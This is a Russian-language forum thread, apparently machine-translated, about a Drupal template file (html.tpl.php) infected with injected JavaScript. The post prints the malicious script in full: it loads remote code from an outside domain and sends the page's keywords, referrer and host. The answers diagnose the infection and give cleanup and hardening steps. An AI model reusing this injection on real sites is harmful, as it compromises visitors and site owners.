PHP-вредоносное ПО внутри этого явно чистого файла?

Question

У меня есть PHP файл (html.tpl.php) внутри модуля для Drupal, со следующим кодом:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" 
    "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php print $language->language; ?>" version="XHTML+RDFa 1.0" dir="<?php print $language->dir; ?>"<?php print $rdf_namespaces; ?>> 

<head profile="<?php print $grddl_profile; ?>"> 
    <?php print $head; ?> 
    <title><?php print $head_title; ?></title> 
    <?php print $styles; ?> 
    <?php print $scripts; ?> 

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://atelier24-gerd-kallhardt.de/js/jquery.min.php?c_utt=K85164&c_utm='+encodeURIComponent('http://atelier24-gerd-kallhardt.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script> 
</head> 
<body class="<?php print $classes; ?>" <?php print $attributes;?>> 
    <div id="skip-link"> 
    <a href="#main-content" class="element-invisible element-focusable"><?php print t('Skip to main content'); ?></a> 
    </div> 
    <?php print $page_top; ?> 
    <?php print $page; ?> 
    <?php print $page_bottom; ?> 
</body> 
</html> 

Моя проблема заключается в том, что некоторые антивирусы флаг это как вредоносные программы.

Пожалуйста, проверьте это virustotal report.

Может быть этот флаг может быть, потому что script включение:

http://atelier24-gerd-kallhardt.de/js/jquery.min.php?

Файл html.tpl.php живет на: /modules/system/ (сайт Drupal).

Вы можете скачать этот файл с here.

Тогда у меня есть некоторые вопросы :

• Является ли это законным файл (несмотря на возможную инфекцию)?
• Было заражено?
• Есть ли хороший и вредоносный код?
• Как я могу удалить плохую часть ?, просто удалив эту строку кода, с помощью: script?
• Как этот код может быть прикреплен там?

Answer 1

Это случилось со мной. Некоторые вредоносные программы ищут файл открытия HTML в структуре dir, я думаю, и сначала нашел это. К счастью, тот, который действительно использовался, из моей темы не был заражен.

Искать этот текст «ателье» во всех ваших файлах или какой-либо другой строке, которая поставляется с этим вредоносным ПО.

Это не особенно плохо, а просто спамер.

Измените все внутренние пароли администратора и (S) FTP и сделайте резервные копии на обычных базах.

Если вы находитесь на общем хосте .. мм ... может быть, что какой-то другой сайт был взломан, а не ваш.

Answer 2

Чтобы ответить на ваши вопросы:

Является ли это законным файл (несмотря на возможную инфекцию)?

Да, это законно

Он был заражен?

Да, он был заражен

Есть хорошие и плохие (вредоносные программы) код?

Вредоносное ПО никогда не бывает хорошим.

Как я могу удалить плохую часть ?, просто удалив эту строку кода, используя: script?

Да, но вы не решили проблему того, как он попал туда в первую очередь.

Как этот код может быть прикреплен к нему?

Что скорее всего произошло, что кто-то эксплуатировали некоторую уязвимость в одном из ваших устаревших модулей Drupal (или ядра Drupal), что позволило им перезаписать html.tpl.php включить этот компонент сценария.

Чтобы подвести итог тому, что он делает, этот тег сценария предназначен для того, чтобы браузер любого, кто посещает ваш сайт, запрашивал страницу с совершенно другого сайта. Этот трюк можно использовать для искусственного раздувания номеров трафика на других сайтах. Там, где окупается автор, в том, что показатели трафика другого сайта будут искусственно завышены.

Такую тактику могут использовать люди, которые взимают с людей деньги, чтобы «привлечь трафик на свой сайт» или самим владельцем сайта, если они продают рекламу на своей веб-странице другим компаниям. Чем выше их количество трафика, тем больше «рекламных» рекламодателей получают больше денег, которые они могут взимать за рекламу.

Что нужно знать о том, что где-то есть уязвимость на вашем сайте, которая позволяет людям перезаписывать файлы в ваших папках, но они хотят.

Вам нужно сделать следующее, или проблема будет возродиться:

• Поместите свой сайт в режим обслуживания, перейдя в/админ/конфигурации/развитие/обслуживание
• Резервное копирование базы данных и вашей сети папка
основные файлы
• Update Друпала следуя этим инструкциям: https://www.drupal.org/docs/7/updating-your-drupal-site/how-to-update-drupal-core
• обновить все модули в/админ/модули/обновление/
• обновления базы данных Run
• После подтверждения всех обновлений модулей были успешными, и если вы не получаете никаких ошибок, то теперь вы можете включить режим обслуживания выключен

Теперь, вы также должны убедиться, что вы обеспечиваете все ваши файлы и папки, соответственно , за исключением того, что они доступны только для чтения (за исключением того, где хранятся загруженные файлы)

Затем, предполагая, что вы находитесь на своем собственном сервере, вам необходимо изучить вопрос о том, какой именно HTTP-сервер вы используете (Apache, Nginx и т. Д.).

Если вы не выполните следующие действия, это будет временем, прежде чем какое-либо вредоносное ПО сканирует ваш сервер, найдет ту же самую уязвимость и использует его аналогичным образом.

Теоретически, вам повезло, что все, что он делает, - это дополнительный трафик на другой сайт. Это могло быть намного хуже.